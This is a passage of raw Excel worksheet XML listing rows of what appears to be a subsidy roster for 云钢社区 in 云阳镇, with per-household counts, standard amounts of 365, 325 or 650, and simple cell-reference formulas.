    <row r="1624" customHeight="1" spans="1:11">
      <c r="A1624" s="23" t="s">
        <v>4364</v>
      </c>
      <c r="B1624" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1624" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1624" s="24" t="s">
        <v>4365</v>
      </c>
      <c r="E1624" s="24" t="s">
        <v>4366</v>
      </c>
      <c r="F1624" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1624" s="24">
        <v>2</v>
      </c>
      <c r="H1624" s="25">
        <v>325</v>
      </c>
      <c r="I1624" s="24">
        <f t="shared" si="25"/>
        <v>650</v>
      </c>
      <c r="J1624" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1624" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1625" customHeight="1" spans="1:11">
      <c r="A1625" s="23" t="s">
        <v>4367</v>
      </c>
      <c r="B1625" s="24" t="str">
        <f>B1624</f>
        <v>云阳镇</v>
      </c>
      <c r="C1625" s="24" t="str">
        <f>C1624</f>
        <v>云钢社区</v>
      </c>
      <c r="D1625" s="62" t="s">
        <v>4368</v>
      </c>
      <c r="E1625" s="62" t="s">
        <v>4369</v>
      </c>
      <c r="F1625" s="24" t="str">
        <f>F1624</f>
        <v>4113210599</v>
      </c>
      <c r="G1625" s="24"/>
      <c r="H1625" s="24"/>
      <c r="I1625" s="24">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J1625" s="24"/>
      <c r="K1625" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1626" customHeight="1" spans="1:11">
      <c r="A1626" s="23" t="s">
        <v>4370</v>
      </c>
      <c r="B1626" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1626" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1626" s="24" t="s">
        <v>4371</v>
      </c>
      <c r="E1626" s="24" t="s">
        <v>4372</v>
      </c>
      <c r="F1626" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1626" s="24">
        <v>1</v>
      </c>
      <c r="H1626" s="25">
        <v>365</v>
      </c>
      <c r="I1626" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1626" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1626" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1627" customHeight="1" spans="1:11">
      <c r="A1627" s="23" t="s">
        <v>4373</v>
      </c>
      <c r="B1627" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1627" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1627" s="24" t="s">
        <v>4374</v>
      </c>
      <c r="E1627" s="24" t="s">
        <v>4375</v>
      </c>
      <c r="F1627" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1627" s="24">
        <v>1</v>
      </c>
      <c r="H1627" s="25">
        <v>365</v>
      </c>
      <c r="I1627" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1627" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1627" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1628" customHeight="1" spans="1:11">
      <c r="A1628" s="23" t="s">
        <v>4376</v>
      </c>
      <c r="B1628" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1628" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1628" s="24" t="s">
        <v>4377</v>
      </c>
      <c r="E1628" s="24" t="s">
        <v>3575</v>
      </c>
      <c r="F1628" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1628" s="24">
        <v>1</v>
      </c>
      <c r="H1628" s="25">
        <v>365</v>
      </c>
      <c r="I1628" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1628" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1628" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1629" customHeight="1" spans="1:11">
      <c r="A1629" s="23" t="s">
        <v>4378</v>
      </c>
      <c r="B1629" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1629" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1629" s="24" t="s">
        <v>4379</v>
      </c>
      <c r="E1629" s="24" t="s">
        <v>3922</v>
      </c>
      <c r="F1629" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1629" s="24">
        <v>1</v>
      </c>
      <c r="H1629" s="25">
        <v>365</v>
      </c>
      <c r="I1629" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1629" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1629" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1630" customHeight="1" spans="1:11">
      <c r="A1630" s="23" t="s">
        <v>4380</v>
      </c>
      <c r="B1630" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1630" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1630" s="24" t="s">
        <v>4381</v>
      </c>
      <c r="E1630" s="24" t="s">
        <v>772</v>
      </c>
      <c r="F1630" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1630" s="24">
        <v>1</v>
      </c>
      <c r="H1630" s="25">
        <v>365</v>
      </c>
      <c r="I1630" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1630" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1630" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1631" customHeight="1" spans="1:11">
      <c r="A1631" s="23" t="s">
        <v>4382</v>
      </c>
      <c r="B1631" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1631" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1631" s="24" t="s">
        <v>4383</v>
      </c>
      <c r="E1631" s="24" t="s">
        <v>4384</v>
      </c>
      <c r="F1631" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1631" s="24">
        <v>1</v>
      </c>
      <c r="H1631" s="25">
        <v>365</v>
      </c>
      <c r="I1631" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1631" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1631" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1632" customHeight="1" spans="1:11">
      <c r="A1632" s="23" t="s">
        <v>4385</v>
      </c>
      <c r="B1632" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1632" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1632" s="24" t="s">
        <v>4386</v>
      </c>
      <c r="E1632" s="24" t="s">
        <v>3587</v>
      </c>
      <c r="F1632" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1632" s="24">
        <v>1</v>
      </c>
      <c r="H1632" s="25">
        <v>365</v>
      </c>
      <c r="I1632" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1632" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1632" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1633" customHeight="1" spans="1:11">
      <c r="A1633" s="23" t="s">
        <v>4387</v>
      </c>
      <c r="B1633" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1633" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1633" s="24" t="s">
        <v>4388</v>
      </c>
      <c r="E1633" s="24" t="s">
        <v>4329</v>
      </c>
      <c r="F1633" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1633" s="24">
        <v>1</v>
      </c>
      <c r="H1633" s="25">
        <v>365</v>
      </c>
      <c r="I1633" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1633" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1633" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1634" customHeight="1" spans="1:11">
      <c r="A1634" s="23" t="s">
        <v>4389</v>
      </c>
      <c r="B1634" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1634" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1634" s="24" t="s">
        <v>4390</v>
      </c>
      <c r="E1634" s="24" t="s">
        <v>3829</v>
      </c>
      <c r="F1634" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1634" s="24">
        <v>1</v>
      </c>
      <c r="H1634" s="25">
        <v>365</v>
      </c>
      <c r="I1634" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1634" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1634" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1635" customHeight="1" spans="1:11">
      <c r="A1635" s="23" t="s">
        <v>4391</v>
      </c>
      <c r="B1635" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1635" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1635" s="24" t="s">
        <v>4038</v>
      </c>
      <c r="E1635" s="24" t="s">
        <v>3670</v>
      </c>
      <c r="F1635" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1635" s="24">
        <v>1</v>
      </c>
      <c r="H1635" s="25">
        <v>365</v>
      </c>
      <c r="I1635" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1635" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1635" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1636" customHeight="1" spans="1:11">
      <c r="A1636" s="23" t="s">
        <v>4392</v>
      </c>
      <c r="B1636" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1636" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1636" s="24" t="s">
        <v>4393</v>
      </c>
      <c r="E1636" s="24" t="s">
        <v>4394</v>
      </c>
      <c r="F1636" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1636" s="24">
        <v>1</v>
      </c>
      <c r="H1636" s="25">
        <v>365</v>
      </c>
      <c r="I1636" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1636" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1636" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1637" customHeight="1" spans="1:11">
      <c r="A1637" s="23" t="s">
        <v>4395</v>
      </c>
      <c r="B1637" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1637" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1637" s="24" t="s">
        <v>4396</v>
      </c>
      <c r="E1637" s="24" t="s">
        <v>2494</v>
      </c>
      <c r="F1637" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1637" s="24">
        <v>1</v>
      </c>
      <c r="H1637" s="25">
        <v>365</v>
      </c>
      <c r="I1637" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1637" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1637" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1638" customHeight="1" spans="1:11">
      <c r="A1638" s="23" t="s">
        <v>4397</v>
      </c>
      <c r="B1638" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1638" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1638" s="24" t="s">
        <v>4398</v>
      </c>
      <c r="E1638" s="24" t="s">
        <v>4399</v>
      </c>
      <c r="F1638" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1638" s="24">
        <v>1</v>
      </c>
      <c r="H1638" s="25">
        <v>365</v>
      </c>
      <c r="I1638" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1638" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1638" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1639" customHeight="1" spans="1:11">
      <c r="A1639" s="23" t="s">
        <v>4400</v>
      </c>
      <c r="B1639" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1639" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1639" s="24" t="s">
        <v>4401</v>
      </c>
      <c r="E1639" s="24" t="s">
        <v>4402</v>
      </c>
      <c r="F1639" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1639" s="24">
        <v>1</v>
      </c>
      <c r="H1639" s="25">
        <v>365</v>
      </c>
      <c r="I1639" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1639" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1639" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1640" customHeight="1" spans="1:11">
      <c r="A1640" s="23" t="s">
        <v>4403</v>
      </c>
      <c r="B1640" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1640" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1640" s="24" t="s">
        <v>4404</v>
      </c>
      <c r="E1640" s="24" t="s">
        <v>4237</v>
      </c>
      <c r="F1640" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1640" s="24">
        <v>1</v>
      </c>
      <c r="H1640" s="25">
        <v>365</v>
      </c>
      <c r="I1640" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1640" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1640" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1641" customHeight="1" spans="1:11">
      <c r="A1641" s="23" t="s">
        <v>4405</v>
      </c>
      <c r="B1641" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1641" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1641" s="24" t="s">
        <v>4406</v>
      </c>
      <c r="E1641" s="24" t="s">
        <v>3695</v>
      </c>
      <c r="F1641" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1641" s="24">
        <v>2</v>
      </c>
      <c r="H1641" s="25">
        <v>325</v>
      </c>
      <c r="I1641" s="24">
        <f t="shared" si="25"/>
        <v>650</v>
      </c>
      <c r="J1641" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1641" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1642" customHeight="1" spans="1:11">
      <c r="A1642" s="23" t="s">
        <v>4407</v>
      </c>
      <c r="B1642" s="24" t="str">
        <f>B1641</f>
        <v>云阳镇</v>
      </c>
      <c r="C1642" s="24" t="str">
        <f>C1641</f>
        <v>云钢社区</v>
      </c>
      <c r="D1642" s="62" t="s">
        <v>4408</v>
      </c>
      <c r="E1642" s="43" t="s">
        <v>3673</v>
      </c>
      <c r="F1642" s="24" t="str">
        <f>F1641</f>
        <v>4113210599</v>
      </c>
      <c r="G1642" s="24"/>
      <c r="H1642" s="24"/>
      <c r="I1642" s="24">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J1642" s="24"/>
      <c r="K1642" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1643" customHeight="1" spans="1:11">
      <c r="A1643" s="23" t="s">
        <v>4409</v>
      </c>
      <c r="B1643" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1643" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1643" s="24" t="s">
        <v>4410</v>
      </c>
      <c r="E1643" s="24" t="s">
        <v>3707</v>
      </c>
      <c r="F1643" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1643" s="24">
        <v>3</v>
      </c>
      <c r="H1643" s="25">
        <v>290</v>
      </c>
      <c r="I1643" s="24">
        <f t="shared" si="25"/>
        <v>870</v>
      </c>
      <c r="J1643" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1643" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1644" customHeight="1" spans="1:11">
      <c r="A1644" s="23" t="s">
        <v>4411</v>
      </c>
      <c r="B1644" s="24" t="str">
        <f>B1643</f>
        <v>云阳镇</v>
      </c>
      <c r="C1644" s="24" t="str">
        <f>C1643</f>
        <v>云钢社区</v>
      </c>
      <c r="D1644" s="62" t="s">
        <v>4412</v>
      </c>
      <c r="E1644" s="43" t="s">
        <v>4413</v>
      </c>
      <c r="F1644" s="24" t="str">
        <f>F1643</f>
        <v>4113210599</v>
      </c>
      <c r="G1644" s="24"/>
      <c r="H1644" s="24"/>
      <c r="I1644" s="24">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J1644" s="24"/>
      <c r="K1644" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1645" customHeight="1" spans="1:11">
      <c r="A1645" s="23" t="s">
        <v>4414</v>
      </c>
      <c r="B1645" s="24" t="str">
        <f>B1644</f>
        <v>云阳镇</v>
      </c>
      <c r="C1645" s="24" t="str">
        <f>C1644</f>
        <v>云钢社区</v>
      </c>
      <c r="D1645" s="62" t="s">
        <v>4415</v>
      </c>
      <c r="E1645" s="62" t="s">
        <v>4416</v>
      </c>
      <c r="F1645" s="24" t="str">
        <f>F1644</f>
        <v>4113210599</v>
      </c>
      <c r="G1645" s="24"/>
      <c r="H1645" s="24"/>
      <c r="I1645" s="24">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J1645" s="24"/>
      <c r="K1645" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1646" customHeight="1" spans="1:11">
      <c r="A1646" s="23" t="s">
        <v>4417</v>
      </c>
      <c r="B1646" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1646" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1646" s="24" t="s">
        <v>4418</v>
      </c>
      <c r="E1646" s="24" t="s">
        <v>3786</v>
      </c>
      <c r="F1646" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1646" s="24">
        <v>1</v>
      </c>
      <c r="H1646" s="25">
        <v>365</v>
      </c>
      <c r="I1646" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1646" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1646" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1647" customHeight="1" spans="1:11">
      <c r="A1647" s="23" t="s">
        <v>4419</v>
      </c>
      <c r="B1647" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1647" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1647" s="24" t="s">
        <v>4420</v>
      </c>
      <c r="E1647" s="24" t="s">
        <v>4421</v>
      </c>
      <c r="F1647" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1647" s="24">
        <v>1</v>
      </c>
      <c r="H1647" s="25">
        <v>365</v>
      </c>
      <c r="I1647" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1647" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1647" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1648" customHeight="1" spans="1:11">
      <c r="A1648" s="23" t="s">
        <v>4422</v>
      </c>
      <c r="B1648" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1648" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1648" s="24" t="s">
        <v>4423</v>
      </c>
      <c r="E1648" s="24" t="s">
        <v>3832</v>
      </c>
      <c r="F1648" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1648" s="24">
        <v>2</v>
      </c>
      <c r="H1648" s="25">
        <v>325</v>
      </c>
      <c r="I1648" s="24">
        <f t="shared" si="25"/>
        <v>650</v>
      </c>
      <c r="J1648" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1648" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1649" customHeight="1" spans="1:11">
      <c r="A1649" s="23" t="s">
        <v>4424</v>
      </c>
      <c r="B1649" s="24" t="str">
        <f>B1648</f>
        <v>云阳镇</v>
      </c>
      <c r="C1649" s="24" t="str">
        <f>C1648</f>
        <v>云钢社区</v>
      </c>
      <c r="D1649" s="62" t="s">
        <v>4425</v>
      </c>
      <c r="E1649" s="43" t="s">
        <v>3566</v>
      </c>
      <c r="F1649" s="24" t="str">
        <f>F1648</f>
        <v>4113210599</v>
      </c>
      <c r="G1649" s="24"/>
      <c r="H1649" s="24"/>
      <c r="I1649" s="24">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J1649" s="24"/>
      <c r="K1649" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1650" customHeight="1" spans="1:11">
      <c r="A1650" s="23" t="s">
        <v>4426</v>
      </c>
      <c r="B1650" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1650" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1650" s="24" t="s">
        <v>4427</v>
      </c>
      <c r="E1650" s="24" t="s">
        <v>4428</v>
      </c>
      <c r="F1650" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1650" s="24">
        <v>1</v>
      </c>
      <c r="H1650" s="25">
        <v>365</v>
      </c>
      <c r="I1650" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1650" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1650" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1651" customHeight="1" spans="1:11">
      <c r="A1651" s="23" t="s">
        <v>4429</v>
      </c>
      <c r="B1651" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1651" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1651" s="24" t="s">
        <v>4430</v>
      </c>
      <c r="E1651" s="24" t="s">
        <v>4431</v>
      </c>
      <c r="F1651" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1651" s="24">
        <v>2</v>
      </c>
      <c r="H1651" s="25">
        <v>325</v>
      </c>
      <c r="I1651" s="24">
        <f t="shared" si="25"/>
        <v>650</v>
      </c>
      <c r="J1651" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1651" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1652" customHeight="1" spans="1:11">
      <c r="A1652" s="23" t="s">
        <v>4432</v>
      </c>
      <c r="B1652" s="24" t="str">
        <f>B1651</f>
        <v>云阳镇</v>
      </c>
      <c r="C1652" s="24" t="str">
        <f>C1651</f>
        <v>云钢社区</v>
      </c>
      <c r="D1652" s="62" t="s">
        <v>4433</v>
      </c>
      <c r="E1652" s="62" t="s">
        <v>4434</v>
      </c>
      <c r="F1652" s="24" t="str">
        <f>F1651</f>
        <v>4113210599</v>
      </c>
      <c r="G1652" s="24"/>
      <c r="H1652" s="24"/>
      <c r="I1652" s="24">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J1652" s="24"/>
      <c r="K1652" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1653" customHeight="1" spans="1:11">
      <c r="A1653" s="23" t="s">
        <v>4435</v>
      </c>
      <c r="B1653" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1653" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1653" s="24" t="s">
        <v>4436</v>
      </c>
      <c r="E1653" s="24" t="s">
        <v>1132</v>
      </c>
      <c r="F1653" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1653" s="24">
        <v>1</v>
      </c>
      <c r="H1653" s="25">
        <v>365</v>
      </c>
      <c r="I1653" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1653" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1653" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1654" customHeight="1" spans="1:11">
      <c r="A1654" s="23" t="s">
        <v>4437</v>
      </c>
      <c r="B1654" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1654" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1654" s="24" t="s">
        <v>4438</v>
      </c>
      <c r="E1654" s="24" t="s">
        <v>4439</v>
      </c>
      <c r="F1654" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1654" s="24">
        <v>1</v>
      </c>
      <c r="H1654" s="25">
        <v>365</v>
      </c>
      <c r="I1654" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1654" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1654" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1655" customHeight="1" spans="1:11">
      <c r="A1655" s="23" t="s">
        <v>4440</v>
      </c>
      <c r="B1655" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1655" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1655" s="24" t="s">
        <v>4441</v>
      </c>
      <c r="E1655" s="24" t="s">
        <v>4442</v>
      </c>
      <c r="F1655" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1655" s="24">
        <v>1</v>
      </c>
      <c r="H1655" s="25">
        <v>365</v>
      </c>
      <c r="I1655" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1655" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1655" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1656" customHeight="1" spans="1:11">
      <c r="A1656" s="23" t="s">
        <v>4443</v>
      </c>
      <c r="B1656" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1656" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1656" s="24" t="s">
        <v>4444</v>
      </c>
      <c r="E1656" s="24" t="s">
        <v>3575</v>
      </c>
      <c r="F1656" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1656" s="24">
        <v>1</v>
      </c>
      <c r="H1656" s="25">
        <v>365</v>
      </c>
      <c r="I1656" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1656" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1656" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1657" customHeight="1" spans="1:11">
      <c r="A1657" s="23" t="s">
        <v>4445</v>
      </c>
      <c r="B1657" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1657" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1657" s="24" t="s">
        <v>4446</v>
      </c>
      <c r="E1657" s="24" t="s">
        <v>4447</v>
      </c>
      <c r="F1657" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1657" s="24">
        <v>1</v>
      </c>
      <c r="H1657" s="25">
        <v>365</v>
      </c>
      <c r="I1657" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1657" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1657" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1658" customHeight="1" spans="1:11">
      <c r="A1658" s="23" t="s">
        <v>4448</v>
      </c>
      <c r="B1658" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1658" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1658" s="24" t="s">
        <v>4449</v>
      </c>
      <c r="E1658" s="24" t="s">
        <v>3922</v>
      </c>
      <c r="F1658" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1658" s="24">
        <v>1</v>
      </c>
      <c r="H1658" s="25">
        <v>365</v>
      </c>
      <c r="I1658" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1658" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1658" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1659" customHeight="1" spans="1:11">
      <c r="A1659" s="23" t="s">
        <v>4450</v>
      </c>
      <c r="B1659" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1659" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1659" s="24" t="s">
        <v>4451</v>
      </c>
      <c r="E1659" s="24" t="s">
        <v>4452</v>
      </c>
      <c r="F1659" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1659" s="24">
        <v>1</v>
      </c>
      <c r="H1659" s="25">
        <v>365</v>
      </c>
      <c r="I1659" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1659" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1659" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1660" customHeight="1" spans="1:11">
      <c r="A1660" s="23" t="s">
        <v>4453</v>
      </c>
      <c r="B1660" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1660" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1660" s="24" t="s">
        <v>4454</v>
      </c>
      <c r="E1660" s="24" t="s">
        <v>4455</v>
      </c>
      <c r="F1660" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1660" s="24">
        <v>1</v>
      </c>
      <c r="H1660" s="25">
        <v>365</v>
      </c>
      <c r="I1660" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1660" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1660" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1661" customHeight="1" spans="1:11">
      <c r="A1661" s="23" t="s">
        <v>4456</v>
      </c>
      <c r="B1661" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1661" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1661" s="24" t="s">
        <v>4457</v>
      </c>
      <c r="E1661" s="24" t="s">
        <v>3637</v>
      </c>
      <c r="F1661" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1661" s="24">
        <v>2</v>
      </c>
      <c r="H1661" s="25">
        <v>325</v>
      </c>
      <c r="I1661" s="24">
        <f t="shared" si="25"/>
        <v>650</v>
      </c>
      <c r="J1661" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1661" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1662" customHeight="1" spans="1:11">
      <c r="A1662" s="23" t="s">
        <v>4458</v>
      </c>
      <c r="B1662" s="24" t="str">
        <f>B1661</f>
        <v>云阳镇</v>
      </c>
      <c r="C1662" s="24" t="str">
        <f>C1661</f>
        <v>云钢社区</v>
      </c>
      <c r="D1662" s="62" t="s">
        <v>4459</v>
